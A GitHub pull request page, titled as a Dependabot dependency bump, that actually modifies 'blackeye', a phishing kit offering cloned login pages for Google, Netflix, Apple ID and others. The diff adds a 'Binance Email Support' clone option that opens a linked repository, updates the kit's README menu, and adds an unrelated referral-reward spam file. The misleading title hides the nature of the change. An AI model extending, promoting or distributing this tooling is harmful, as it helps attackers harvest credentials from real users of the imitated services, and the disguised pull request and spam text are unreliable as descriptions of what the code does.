Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Dependabot/npm and yarn/follow redirects 1.15.6 #68

Open
wants to merge 13 commits into
base: dependabot/npm_and_yarn/follow-redirects-1.15.6
Choose a base branch
from
3 changes: 3 additions & 0 deletions Athene Lion🦁 Shares
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
Get 15000 lion on your level criteria
Get 1000 gem if u have refferd atleast two people in your network
Share after you have successfully received yours
7 changes: 5 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,8 @@

![alt text](https://raw.githubusercontent.com/EricksonAtHome/blackeye/main/img/bankofa.png)

[New Binance Email Support Clone for BLACKEYE v3.1 ](https://github.com/EricksonAtHome/bes)

### UPDATES :
##### UPDATES_TMP websites :

Expand All @@ -21,7 +23,8 @@
[05] Github [21] GitLab [37] Netflix
[06] Google [22] Twitch [38] Reddit
[07] Origin [23] MySpace [39] StackOverflow
[08] Yahoo [24] Badoo [40] Custom
[08] Yahoo [24] Badoo [40] Custom
[41] Binance Email Support
[09] Linkedin [25] VK
[10] Protonmail [26] Yandex
[11] Wordpress [27] devianART
Expand Down Expand Up @@ -59,7 +62,7 @@ cd blackeye
bash blackeye.sh
```

![alt text](https://raw.githubusercontent.com/EricksonAtHome/blackeye/main/img/hiws.png)
![alt text](https://raw.githubusercontent.com/EricksonAtHome/blackeye/main/img/hiws2.png)

### Donate! @EricksonHolding
Donate And Support:
Expand Down
16 changes: 16 additions & 0 deletions blackeye.sh
Original file line number Diff line number Diff line change
@@ -1,5 +1,16 @@
#!/bin/bash

open_page() {
url="https://github.com/EricksonAtHome/bes"
open "$url"
}

start_server() {
server=$1
# Start de server
echo "Start de server voor: $server"
}

# Upgraded by: @EricksonAtHome (https://github.com/EricksonAtHome/blackeye)
#Enhanced ngrok tunnelling
trap 'printf "\n";stop;exit 1' 2
Expand All @@ -21,6 +32,7 @@ printf " \e[1;92m[\e[0m\e[1;77m13\e[0m\e[1;92m]\e[0m\e[1;91m IGFollower
printf " \e[1;92m[\e[0m\e[1;77m14\e[0m\e[1;92m]\e[0m\e[1;91m Pinterest\e[0m \e[1;92m[\e[0m\e[1;77m30\e[0m\e[1;92m]\e[0m\e[1;91m Steam \e[0m \n"
printf " \e[1;92m[\e[0m\e[1;77m15\e[0m\e[1;92m]\e[0m\e[1;91m Apple ID\e[0m \e[1;92m[\e[0m\e[1;77m31\e[0m\e[1;92m]\e[0m\e[1;91m Tiktok \e[0m \n"
printf " \e[1;92m[\e[0m\e[1;77m16\e[0m\e[1;92m]\e[0m\e[1;91m Verizon\e[0m \e[1;92m[\e[0m\e[1;77m32\e[0m\e[1;92m]\e[0m\e[1;91m Playstation \e[0m \e[1;94m \n"
printf " \e[1;92m[\e[0m\e[1;77m41\e[0m\e[1;92m]\e[0m\e[1;91m Binance Email Support \e[0m \e[1;94m \n"


read -p $'\n\e[1;92m\e[0m\e[1;77m\e[0m\e[1;92m ┌─[ Choose an option:]─[~]
Expand Down Expand Up @@ -185,6 +197,10 @@ server="create"
createpage
start

elif [[ $option == 41 ]]; then
open_page


else
printf "\e[1;93m [!] Invalid option!\e[0m\n"
menu
Expand Down
Binary file modified img/hiws.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added img/hiws2.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.